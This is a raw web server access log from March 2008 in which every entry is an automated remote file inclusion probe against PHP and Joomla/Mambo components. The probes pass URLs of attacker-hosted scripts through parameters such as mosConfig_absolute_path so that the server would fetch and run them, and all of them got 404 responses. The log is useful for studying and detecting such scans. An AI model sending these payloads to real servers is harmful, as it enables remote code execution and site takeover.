69.57.154.47 - - [27/Mar/2008:09:52:56 -0700] "GET //includes/dbal.php?eqdkp_root_path=http://brothers.ro/modules/us.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:54:22 -0700] "GET /logs/access.log//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:54:22 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:54:22 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.103.129 - - [27/Mar/2008:09:54:57 -0700] "GET /logs/access_080218.log//index.php?option=com_user=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.191.103.129 - - [27/Mar/2008:09:55:06 -0700] "GET //index.php?option=com_user=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.191.103.129 - - [27/Mar/2008:09:55:07 -0700] "GET /logs//index.php?option=com_user=§ionid=&id=&mosConfig_absolute_path=http://hibbard22.net/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:55:09 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:55:09 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:55:09 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:55:20 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:55:21 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:55:21 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.73.237 - - [27/Mar/2008:09:55:35 -0700] "GET /logs/index.php?pg=http://trofey.ru/baza/frol/frol_territoriya/images/.bckimg/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
85.214.73.237 - - [27/Mar/2008:09:55:35 -0700] "GET /index.php?pg=http://trofey.ru/baza/frol/frol_territoriya/images/.bckimg/contr.txt? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:55:45 -0700] "GET /logs/access_080313.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:09:55:57 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.65 - - [27/Mar/2008:09:56:20 -0700] "GET /logs/access_080312.log//page_tail.php?includePath=http://japanese.hsc.ac.kr/bbs//skin/ruvin_fine_gall2/INFO/IID.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:09:56:21 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:09:56:21 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:09:56:23 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:56:28 -0700] "GET /logs/access_080216.log/main.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:56:28 -0700] "GET /main.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.158.234 - - [27/Mar/2008:09:56:28 -0700] "GET /logs/main.php?x=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:56:31 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:56:31 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:56:31 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:09:56:32 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:56:32 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:56:32 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:09:56:32 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:09:56:33 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:09:56:34 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:56:53 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:56:53 -0700] "GET /administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:56:53 -0700] "GET /logs/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:57:04 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:57:08 -0700] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:09:57:20 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.143.232.148 - - [27/Mar/2008:09:57:36 -0700] "GET /logs/access.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.86.119 - - [27/Mar/2008:09:57:50 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://216.191.16.12/.shell/site/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.214.26 - - [27/Mar/2008:09:58:12 -0700] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.15.10.144 - - [27/Mar/2008:09:58:30 -0700] "GET /logs//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://mamika.net///wp-content/uploads/2007/03/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
204.15.10.144 - - [27/Mar/2008:09:58:30 -0700] "GET //index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://mamika.net///wp-content/uploads/2007/03/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:59:13 -0700] "GET /logs/access_080113.log/index.php?place=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:59:13 -0700] "GET /index.php?place=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.74.17 - - [27/Mar/2008:09:59:13 -0700] "GET /logs/index.php?place=ftp://84.32.137.157/incoming/upload/trec/oldbisok? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.35.85.7 - - [27/Mar/2008:09:59:20 -0700] "GET /logs/access_080215.log//includes/functions_admin.php?phpbb_root_path=http://www.motoxclub.org.au/forum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.35.85.7 - - [27/Mar/2008:09:59:20 -0700] "GET //includes/functions_admin.php?phpbb_root_path=http://www.motoxclub.org.au/forum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.35.85.7 - - [27/Mar/2008:09:59:20 -0700] "GET /logs//includes/functions_admin.php?phpbb_root_path=http://www.motoxclub.org.au/forum/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:09:59:32 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:09:59:33 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.225.219.10 - - [27/Mar/2008:09:59:33 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:09:59:43 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.83.173.216 - - [27/Mar/2008:10:00:03 -0700] "GET /logs/access_080215.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:10:00:12 -0700] "GET /logs/access_080306.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:10:00:57 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:10:00:57 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.93.107.242 - - [27/Mar/2008:10:00:57 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
86.109.98.97 - - [27/Mar/2008:10:01:01 -0700] "GET /logs//index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
86.109.98.97 - - [27/Mar/2008:10:01:03 -0700] "GET //index.php?option=com_loudmounth&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.214.86.231 - - [27/Mar/2008:10:01:19 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
85.214.86.231 - - [27/Mar/2008:10:01:19 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:10:02:09 -0700] "GET /logs/access_080220.log/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:10:02:10 -0700] "GET /homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:10:02:11 -0700] "GET /logs/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.100.222 - - [27/Mar/2008:10:02:11 -0700] "GET /logs/access_080216.log/homepage.php?sel=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:10:02:17 -0700] "GET /logs/access_080201.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:10:02:17 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.184.192 - - [27/Mar/2008:10:02:18 -0700] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.enricco.cl/catalogo/catalog/images/bot_site.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.166.35.71 - - [27/Mar/2008:10:02:48 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://caloteiros.iespana.es/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:10:03:28 -0700] "GET /logs/access_080129.log/index.php?pageurl=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:10:03:35 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:10:03:35 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [27/Mar/2008:10:03:35 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.47.176 - - [27/Mar/2008:10:04:00 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
222.236.47.176 - - [27/Mar/2008:10:04:00 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/test.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.244.26.216 - - [27/Mar/2008:10:04:40 -0700] "GET /logs/access_080313.log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.244.26.216 - - [27/Mar/2008:10:04:40 -0700] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://claroline.lct-net.cl/www????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.179.218 - - [27/Mar/2008:10:04:47 -0700] "GET /logs/access_080207.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.253.126.14 - - [27/Mar/2008:10:05:02 -0700] "GET /logs/access_080125.log//page_tail.php?includePath=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
66.253.126.14 - - [27/Mar/2008:10:05:02 -0700] "GET //page_tail.php?includePath=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
66.253.126.14 - - [27/Mar/2008:10:05:03 -0700] "GET /logs//page_tail.php?includePath=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:10:05:08 -0700] "GET /logs/access_080312.log//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:10:05:09 -0700] "GET //index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.136.6.38 - - [27/Mar/2008:10:05:09 -0700] "GET /logs//index.php?option=com_lurm_constructor&Itemid=&mosConfig_absolute_path=http://elurbano.com/elurbano/administrator/components/com_jreactions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:10:05:41 -0700] "GET /logs/access_080306.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/peler88/31377albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.47.220.175 - - [27/Mar/2008:10:05:41 -0700] "GET /logs//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/peler88/31377albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
59.92.140.116 - - [27/Mar/2008:10:05:58 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.140.116 - - [27/Mar/2008:10:05:59 -0700] "GET //akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.253.126.14 - - [27/Mar/2008:10:05:59 -0700] "GET /logs/access_080201.log//page_tail.php?includePath=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.801" "www.dmulk.com"
59.92.140.116 - - [27/Mar/2008:10:06:00 -0700] "GET /logs//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:10:06:02 -0700] "GET /logs/access_080312.log//admin/business_inc/saveserver.php?thisdir=http://www.thehogbitch.com/modules/contr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:10:06:02 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.thehogbitch.com/modules/contr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.118.85.15 - - [27/Mar/2008:10:06:03 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.thehogbitch.com/modules/contr.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.50.105.133 - - [27/Mar/2008:10:06:11 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:10:06:11 -0700] "GET /logs/access_080223.log/index.php?body=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.56.202.30 - - [27/Mar/2008:10:06:13 -0700] "GET /logs/index.php?body=http://onix2131.atspace.com/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.227.214.26 - - [27/Mar/2008:10:06:20 -0700] "GET /logs/access_080306.log//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.227.214.26 - - [27/Mar/2008:10:06:20 -0700] "GET /logs//index.php?option=com_estateagent&act=easearch&Itemid=&mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:06:30 -0700] "GET /logs/access_080131.log/scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:06:30 -0700] "GET /scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:06:30 -0700] "GET /logs/scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:06:32 -0700] "GET /logs/access_080131.log/scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:06:32 -0700] "GET /scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.40.110.80 - - [27/Mar/2008:10:06:32 -0700] "GET /logs/scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:10:06:35 -0700] "GET /logs/access_080131.log/scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [27/Mar/2008:10:06:36 -0700] "GET /scanhttp://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
59.92.140.116 - - [27/Mar/2008:10:06:36 -0700] "GET /logs/access_080128.log//akocomments.php?mosConfig_absolute_path=http://claroline.lct-net.cl/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
